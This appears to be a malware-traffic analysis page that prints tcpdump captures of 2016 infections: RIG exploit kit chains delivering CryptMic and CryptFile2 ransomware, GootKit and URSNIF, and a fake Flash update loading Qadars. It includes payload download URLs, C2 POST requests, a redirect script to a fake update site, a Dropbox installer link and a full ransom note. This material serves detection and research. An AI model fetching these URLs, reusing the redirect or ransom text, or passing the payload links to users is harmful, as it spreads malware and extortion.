Text Example

RIG Web-based Exploit Kit EK Exploits Flash and loads Ransomware Variant CryptMic Malware PCAP file download 91.121.74.154

2016-09-26 00:40:25.886473 IP 192.168.1.18.51426 > 5.196.126.167.80: Flags [P.], seq 1:512, ack 1, win 16475, length 511: HTTP: GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
E..’.R@………..~….P..W..2.VP.@[….GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko
Host: chink12alzona.cyclemanagementassociates.info

2016-09-26 00:40:26.295112 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], ack 512, win 237, length 0
E..(..@.:…..~……P…2.V..Y.P….H..
2016-09-26 00:40:27.640845 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], seq 1:1319, ack 512, win 237, length 1318: HTTP: HTTP/1.1 200 OK
E..N..@.:…..~……P…2.V..Y.P…….HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2016 00:40:57 GMT
Content-Type: application/x-msdownload
Content-Length: 95232
Connection: keep-alive
Accept-Ranges: bytes

2016-09-26 00:40:31.356592 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [.], seq 9:1327, ack 19, win 257, length 1318
E..NX.@.z.8
[yJ………’ejB…aP…….NOT YOUR LANGUAGE? USE https://translate.google.com

What happened to your files ?
All of your files were protected by a strong encryption with RSA4096
More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

How did this happen ?
!!! Specially for your PC was generated personal RSA4096 Key , both public and private.
!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server

What do I do ?
So , there are two ways you can choose: wait for a _miracle_ and get _your_ PRICE DOUBLED! Or start obtaining *BITCOIN NOW! , and restore _YOUR_ _DATA_ easy way
If You have really valuable _DATA_, you better _NOT_ _WASTE_ _YOUR_ _TIME_, because there is _NO_ other way to get your files, except make a _PAYMENT_

Your personal ID: 2312323345345IDB23423423423445634dfg34ID

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:

1 – http://ccjlwb22w6c22p2k.onion.to
2 – http://ccjlwb22w6c22p2k.onion.city

If for some reasons the addresses are not availablweropie
2016-09-26 00:40:31.356709 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [P.], seq 1327:1668, ack 19, win 257, length 341
E..}X.@.z.;.[yJ………’eoh…aP…_5.., follow these steps:

1 – Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2 – Video instruction: https://www.youtube.com/watch?v=NQrUZdsw2hA
3 – After a successful installation, run the browser
4 – Type in the address bar: http://ccjlwb22w6c22p2k.onion
5 – Follow the instructions on the site

 

GootKit Banking Trojan Malware Delivered by RIG Exploit Kit EK PCAP file download traffic sample

2016-09-21 10:01:56.988869 IP 192.168.1.7.49212 > 31.184.193.179.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: G
ET / HTTP/1.1
E..A._@…N……….<.P…’.iR.P.@…..GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.hairaddict.fr/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: myorderdesk.top
Connection: Keep-Alive

2016-09-21 10:01:57.203904 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], ack 282, win 123, length 0
E..(“.@.8.y……….P.<.iR….@P..{L…
2016-09-21 10:01:57.204021 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], seq 1:1351, ack 282, win 123, length 1350: HTTP: HTTP/1.1 200 OK
E..n”.@.8.tK………P.<.iR….@P..{….HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 14:02:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 4439
Connection: close
Content-Type: application/x-shockwave-flash

CWS     ….x..X.t.Wy.;..}IZ..lKv…cg.Z….Md=-[.-…@3wfvf……>p..&MCC.&!..K.B mHiB.@.=….9=X.=..-$”..!P(m..V..!i…………

2016-09-21 10:02:01.948239 IP 192.168.1.7.49215 > 185.117.73.233.80: Flags [P.], seq 1118:1555, ack 27790, win 16269, length 437: HTTP: GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
E…..@…*……uI..?.P…..3..P.?…..GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: v4yw02i.c0ekkjjz.top
Connection: Keep-Alive

2016-09-21 10:02:02.152809 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], ack 1555, win 515, length 0
E..(..@.5….uI……P.?.3……P….J..
2016-09-21 10:02:04.257191 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], seq 27790:29140, ack 1555, win 515, length 1350: HTTP: HTTP/1.1 200 OK
E..n..@.5….uI……P.?.3……P…m…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 21 Sep 2016 14:04:12 GMT
Content-Type: application/x-msdownload
Content-Length: 212992
Connection: keep-alive
Accept-Ranges: bytes

 

2016-09-21 10:02:09.452597 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [S.], seq 1684872271, ack 3876680400, win 29200, options [mss 1350,nop,wscale 7,nop,nop,sackOK], length 0
E..4..@.-.S.xr.1…..P.Ddm.O..r…r.o……F……..
2016-09-21 10:02:09.452891 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [.], ack 1, win 16537, length 0
E..(..@………xr.1.D.P..r.dm.PP.@………..
2016-09-21 10:02:09.452891 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [.], ack 1, win 16537, length 0
E..(..@………xr.1.D.P..r.dm.PP.@………..
2016-09-21 10:02:09.454382 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [P.], seq 1:124, ack 1, win 16537, length 123: HTTP
E…..@………xr.1.D.P..r.dm.PP.@..E……v…r..W….j……$…..\…Z…(.?I.a…./.5…
…..   .
.2.8…….1…………..neonbdfindcraft.win.
…………..
2016-09-21 10:02:09.454382 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [P.], seq 1:124, ack 1, win 16537, length 123: HTTP
E…..@………xr.1.D.P..r.dm.PP.@..E……v…r..W….j……$…..\…Z…(.?I.a…./.5…
…..   .
.2.8…….1…………..neonbdfindcraft.win.
…………..
2016-09-21 10:02:10.167283 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [.], ack 124, win 229, length 0
E..(.~@.-…xr.1…..P.Ddm.P..sKP… …
2016-09-21 10:02:10.167283 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [.], ack 124, win 229, length 0
E..(.~@.-…xr.1…..P.Ddm.P..sKP… …
2016-09-21 10:02:10.167352 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [P.], seq 1:1299, ack 124, win 229, length 1298: HTTP
E..:..@.-…xr.1…..P.Ddm.P..sKP….{……Y…U..W…..i.q.*.3..J{Y…..n…`…V x.J….x..x).3:&G9……u…V..j………………….V…R..O..L0..H0..0.  …_z…@0..    *.H……..0f1.0        ..U….GB1.0…U….Yorks1.0…U….York1.0…U.
..MyCompany Ltd.1.0     ..U….IT1.0…U…     localhost0…160825192527Z..260823192527Z0f1.0  ..U….GB1.0…U….Yorks1.0…U….York1.0…U.
..MyCompany Ltd.1.0     ..U….IT1.0…U…     localhost0..”0..        *.H………….0..
……<.._Qm..!….%Q.K..!..o.[4…..a)S….|…X…Y:%………..c…\.l..Z’…….5……..E.
………@.v.eux……..}3&>….M.(…….^c..s..x.a…….UVH…x.
…&..f<…..:…….F…,.#…..L……>8.mi..!….2….s..cF`..H….D…^e\…?L..1…’…..s…….0..       *.H………….4…….0…..-6.,…nY.?1…Jy…….)…sURl..9V(h…A..V….)%……{>…*9….).l…r…H……..g.Nf…).4…V..)….6~….(.TT.Acy.>2.v…..[.I.Mk..%-…………….*.K]p..w. @….#……+..\u……………V..Kx-….s..w…..m..fT…7……$/.v..8t….K…G…A………..Q6…e._…W……v……(.}.l.*S..F5.. Z:.c….W.;……..S..B.!2.}..*..Q.d………..c.m=. .>…Y2..!l.35d.#..mK..R5b……..0,_8..$+…0…G.<^..f…..VWN…%..’..!.-*……<{.ZP!.I..:?c. ..&,.\……s..}nM.6<…=.#….Y…;..!…r.B0x…2..H.&..!.
~.O*..!U6.k…H…..    !!..5m=~5..”.+.e…..>…o.T.`\….2…………

RIG Exploit Kit EK Delivers Ransomware Variant CryptFile2 Malware C2 PCAP file download

2016-09-19 09:49:33.246002 IP 192.168.4.57.49469 > 192.185.52.124.80: Flags [P.], seq 1:303, ack 1, win 16537, length 302: HTTP: GET / HTTP/1.1
E..V4 @….k…9..4|.=.P’…….P.@..F..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: photos2tile.com
Connection: Keep-Alive
Cookie: PHPSESSID=11621c75d998a91f4a371effa2d932a8


2016-09-19 09:49:40.123529 IP 192.168.4.57.49490 > 31.184.193.187.80: Flags [.], ack 1, win 16537, length 0
E..(D.@……..9…..R.P.U/~.I..P.@………..
2016-09-19 09:49:40.123610 IP 192.168.4.57.49491 > 31.184.193.187.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: GET / HTTP/1.1
E..AD.@……..9…..S.P…….ZP.@.p<..GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://photos2tile.com/
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.autogrs.party
Connection: Keep-Alive

2016-09-19 09:49:43.630996 IP 192.168.4.57.49493 > 109.234.36.38.80: Flags [P.], seq 1155:1604, ack 27918, win 16265, length 449: HTTP: GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
E…NF@…S….9m.$&.U.Pt…….P.?.A…GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: add.arielcatering.com
Connection: Keep-Alive

2016-09-19 09:49:43.816016 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], ack 1604, win 258, length 0
E..(S.@.8…m.$&…9.P.U….t…P…V…
2016-09-19 09:49:44.884404 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], seq 27918:29268, ack 1604, win 258, length 1350: HTTP: HTTP/1.1 200 OK
E..nS.@.8…m.$&…9.P.U….t…P…….HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Sep 2016 13:49:46 GMT
Content-Type: application/x-msdownload
Content-Length: 98304
Connection: keep-alive
Accept-Ranges: bytes

016-09-19 09:49:50.836417 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 1:154, ack 1, win 16537, length 153: HTTP: GET /headers.jpg HTTP/1.1
E…O.@……..9…n.V.P….(_..P.@…..GET /headers.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 176.31.127.110
Cache-Control: no-cache

2016-09-19 09:49:51.102944 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [.], ack 154, win 237, length 0
E..(..@.3.R;…n…9.P.V(_……P…A…
2016-09-19 09:49:51.370886 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [P.], seq 1:234, ack 154, win 237, length 233: HTTP: HTTP/1.1 200 OK
E…..@.3.QQ…n…9.P.V(_……P…….HTTP/1.1 200 OK
Date: Mon, 19 Sep 2016 13:50:08 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: “7-5332e92dca840”
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg

default
2016-09-19 09:49:51.371212 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [.], ack 234, win 16479, length 0
E..(O.@……..9…n.V.P….(_.{P.@_.0……..
2016-09-19 09:49:54.845384 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 154:331, ack 234, win 16479, length 177: HTTP: POST /zig/offers.php HTTP/1.1
E…O.@……..9…n.V.P….(_.{P.@_….POST /zig/offers.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 176.31.127.110
Content-Length: 1395
Cache-Control: no-cache

 

Packet Analysis Rig Exploit Kit EK Delivers URSNIF Banking Trojan Malware PCAP file download sample

2016-09-02 10:26:46.478966 IP 192.168.4.200.49222 > 194.165.16.204.80: Flags [P.], seq 1:391, ack 1, win 16537, length 390: HTTP:
GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/ HTTP/1.1
E…..@…[……….F.Pbe.c….P.@..P..GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9s
s1din5pme6r6clcm9leeno4pnmf/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.gaapasa.com.au/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: sivupig.top
Connection: Keep-Alive

2016-09-02 10:26:46.774522 IP 192.168.4.200.49222 > 194.165.16.204.80: Flags [F.], seq 391, ack 5942, win 16402, length 0
E..(..@…\……….F.Pbe…..(P.@./&……..
2016-09-02 10:26:47.007595 IP 192.168.4.200.49221 > 194.165.16.204.80: Flags [P.], seq 1:403, ack 1, win 16537, length 402: HTTP: GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/njr.gif HTTP/1.1
E….!@…[;………E.P$W…YA*P.@…..GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/njr.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.gaapasa.com.au/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: sivupig.top
Connection: Keep-Alive

 

 

 

 

 

2016-09-02 10:32:18.729778 IP 192.168.4.200.49233 > 185.39.72.169.80: Flags [P.], seq 1:941, ack 1, win 16537, length 940: HTTP:
POST /images/NQ7qefK05DcL/8AQgPQWEUfX/UuqN22NQXUazEl/uuGGDuVwKlZDxDrjGR1I_/2F_2F4ZP67GoFJY4/fjOinZW31vb07eN/rQDpu_2BdxoNTMnJ9o/zn
Rft0UM0/0wGtacJzyDCAKHMyYCnm/RYBzb_2BAKLxzUP3nPm/kQ3rVLpqeH3b1nyPWqpQN6/cA.bmp HTTP/1.1
E…..@…’E…..’H..Q.P..;.p…P.@.j&..POST /images/NQ7qefK05DcL/8AQgPQWEUfX/UuqN22NQXUazEl/uuGGDuVwKlZDxDrjGR1I_/2F_2F4ZP67GoFJ
Y4/fjOinZW31vb07eN/rQDpu_2BdxoNTMnJ9o/znRft0UM0/0wGtacJzyDCAKHMyYCnm/RYBzb_2BAKLxzUP3nPm/kQ3rVLpqeH3b1nyPWqpQN6/cA.bmp HTTP/1.1
Content-Type: multipart/form-data; boundary=————————–8d26b8d26b8d26b
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: diokamkahmi.at
Content-Length: 465
Connection: Keep-Alive
Cache-Control: no-cache

—————————-8d26b8d26b8d26b
Content-Disposition: form-data; name=”upload_file”; filename=”CA1E.bin”
Content-Type: application/octet-stream

MSCF…………,……………….O…….T………”I.D .01D205160934258A0B.=Z….T.CK..M..@…..w…D…p.Mt…CHd .Q/..q.,\h
&m……..1″$…’……….2`……………D.T…….E.l…0….\….l.Z….t…’…….. .[…….L……j..Ku.W….AS…s_..
—————————-8d26b8d26b8d26b–

2016-09-02 10:32:19.386415 IP 185.39.72.169.80 > 192.168.4.200.49233: Flags [.], ack 941, win 64595, length 0
E..(E}@.2.<..’H……P.Qp…..?.P..S….
2016-09-02 10:32:19.386531 IP 185.39.72.169.80 > 192.168.4.200.49233: Flags [P.], seq 1:135, ack 941, win 64595, length 134: HTTP
: HTTP/1.1 200 OK
E…E.@.2.;f.’H……P.Qp…..?.P..S@…HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 12:32:03 GMT
Content-Type: text/html
Content-Length: 0
Connection: close

Fake Adobe Flash Player Update Binary Loads Qadars & Tor Bot Malware PCAP file download Traffic Sample

016-09-01 18:42:39.848166 IP 192.168.4.175.49440 > 82.194.88.80.80: Flags [P.], seq 1:250, ack 1, win 64800, length 249: HTTP: GET / HTTP/1.1
E..!/0@…Z=….R.XP. .Py……
P..  {..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: sinlabajos.com
Connection: Keep-Alive

2016-09-01 18:42:40.094526 IP 82.194.88.80.80 > 192.168.4.175.49440: Flags [.], ack 250, win 15544, length 0
E..(M.@.4…R.XP…..P. …
y…P.<…..
2016-09-01 18:42:42.211314 IP 82.194.88.80.80 > 192.168.4.175.49440: Flags [.], seq 1:1351, ack 250, win 15544, length 1350: HTTP: HTTP/1.1 200 OK
E..nM.@.4..eR.XP…..P. …
y…P.<.o…HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:47 GMT
Server: Apache
Set-Cookie: 97c4d18b9c1b1386940bcf59303c3d2c=f84c33ffa7536c4fe576320400047d19; path=/; HttpOnly
P3P: CP=”NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM”
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 01 Sep 2016 20:42:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
X-Powered-By: PleskLin
Content-Length: 7965
Connection: close
Content-Type: text/html; charset=utf-8

2016-09-01 18:42:45.303305 IP 192.168.4.175.49497 > 85.25.95.39.80: Flags [P.], seq 1:301, ack 1, win 16537, length 300: HTTP: GET /js/analytic.php?id=4 HTTP/1.1
E..T4.@…K1….U._’.Y.PJ..s…
P.@.._..GET /js/analytic.php?id=4 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://sinlabajos.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 4lmbkpqrklqv.net
Connection: Keep-Alive

2016-09-01 18:42:45.494614 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [.], ack 301, win 123, length 0
E..(..@.5…U._’…..P.Y…
J…P..{….
2016-09-01 18:42:48.726768 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [P.], seq 1:1229, ack 301, win 123, length 1228: HTTP: HTTP/1.1 200 OK
E…..@.5…U._’…..P.Y…
J…P..{.x..HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:56 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips
X-Powered-By: PHP/5.4.45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

2016-09-01 18:42:51.521801 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [P.], seq 1234:1603, ack 620, win 131, length 369: HTTP: HTTP/1.1 200 OK
E…..@.5..3U._’…..P.Y….J…P….E..HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:56 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips
X-Powered-By: PHP/5.4.45
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

6c
window.open(‘http://adobe-secur-update.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427’, ‘_self’);

2016-09-01 18:42:52.009085 IP 192.168.4.175.49510 > 69.64.36.212.80: Flags [P.], seq 1:311, ack 1, win 16537, length 310: HTTP: GET /update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427 HTTP/1.1
E..^9.@….8….E@$..f.P(*
….#P.@.p…GET /update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: adobe-secur-update.com
Connection: Keep-Alive

<script>
setTimeout(“location.href = ‘https://www.dropbox.com/s/rj644igtfr503cs/flashplayer22_me_install.exe?dl=1′;”, 1000);
$(function() {

2016-09-01 19:01:27.398866 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [P.], seq 1:168, ack 1, win 16537, length 167
E…5.@…f…………..]……P.@…………….W..-.~..     8.y…..J….?……..K..*.<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….K…………..j8le7s5q745e.org……….
…………………………….
2016-09-01 19:01:27.666128 IP 176.189.232.3.443 > 192.168.4.175.50071: Flags [P.], seq 1:80, ack 168, win 68, length 79
E..w;>@.r.o*……………..]..P..D……..J…F..
1.)….+Hn..C.f..:..@..<….M.. pl~…..E.~…2…..g…..S..U…=.
2016-09-01 19:01:27.666269 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [.], ack 80, win 16517, length 0
E..(5.@…g…………..]…..3P.@.r………
2016-09-01 19:01:27.849509 IP 176.189.232.3.443 > 192.168.4.175.50071: Flags [P.], seq 80:1121, ack 168, win 68, length 1041
E..9;?@.r.kg……………3.]..P..D……………….0…0………   ..u…8d.0..    *.H……..0..1.0       ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0…160411003559Z..170411003559Z0..1.0        ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0..”0..       *.H………….0..
…………t^g……..`C?B..R….O9.o]….#*.PI…i…..`e..Id=7..T.t.K..+.a2N\
..\$.OD<….|…..t….!P.u..p.D…OA…\……X….;..&..5.J..3.}.pTx……D…..c.z.N…-2….”qv)…@4..Xf:….T7.
@……3..s..2..&….w.o._.=F^%…….Z..H…^}cz…….j.-………P0N0…U……..$.l..9….q….c..0…U.#..0…..$.l..9….q….c..0…U….0….0..        *.H……………..+……QI….K$.KT.z13…….v…….|4nC0]..@.Y…..S……….A…t.0.(.kB….\bu*:…g…,..AeJ[E.Y.9..|_/..L.-…..N..5]]..j.”8..#.u……v..P(.C:-……’..+…:+&.*[T…U….?.,..o!…j..\V…R..>x.2….D7.-..q.7….W….>……_=z…V………D………..
2016-09-01 19:01:27.849663 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [.], ack 1121, win 16257, length 0
E..(5.@…g…………..]…..DP.?.o………

2016-09-01 19:02:37.162264 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [S], seq 3405242436, win 8192, options [mss 1464,nop,wscale 2,nop,nop,sackOK], length 0
E..46’@………>K.a…….D…… ..}…………..
2016-09-01 19:02:37.438269 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [S.], seq 3326033908, ack 3405242437, win 14600, options [mss 1350,nop,wscale 6,nop,nop,sackOK], length 0
E..4,F@.5.Fz>K.a………??….E..9……..F……..
2016-09-01 19:02:37.438392 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [.], ack 1, win 16537, length 0
E..(6)@………>K.a…….E.??.P.@.%p……..
2016-09-01 19:02:37.438829 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [P.], seq 1:199, ack 1, win 16537, length 198
E…6*@………>K.a…….E.??.P.@…………….W..sT3.383.:zZ..1p7…g…u….
..*.<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….j……..4.2../cfa8ed451f322249a33d9f877f75356c.konektyfor.com……….
…………………………….
2016-09-01 19:02:37.631759 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [.], ack 199, win 245, length 0
E..(..@.5…>K.a………??…..P…dN..
2016-09-01 19:02:37.631878 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [.], seq 1:1351, ack 199, win 245, length 1350
E..n..@.5…>K.a………??…..P…T#……Y…U..W…+C.”….8..H.8…I…..X…. ..f…..Q.Kv.@      …j[…(Lw..X..|……………………………0…0………        ..u…8d.0..    *.H……..0..1.0       ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0…160411003559Z..170411003559Z0..1.0        ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0..”0..       *.H………….0..
…………t^g……..`C?B..R….O9.o]….#*.PI…i…..`e..Id=7..T.t.K..+.a2N\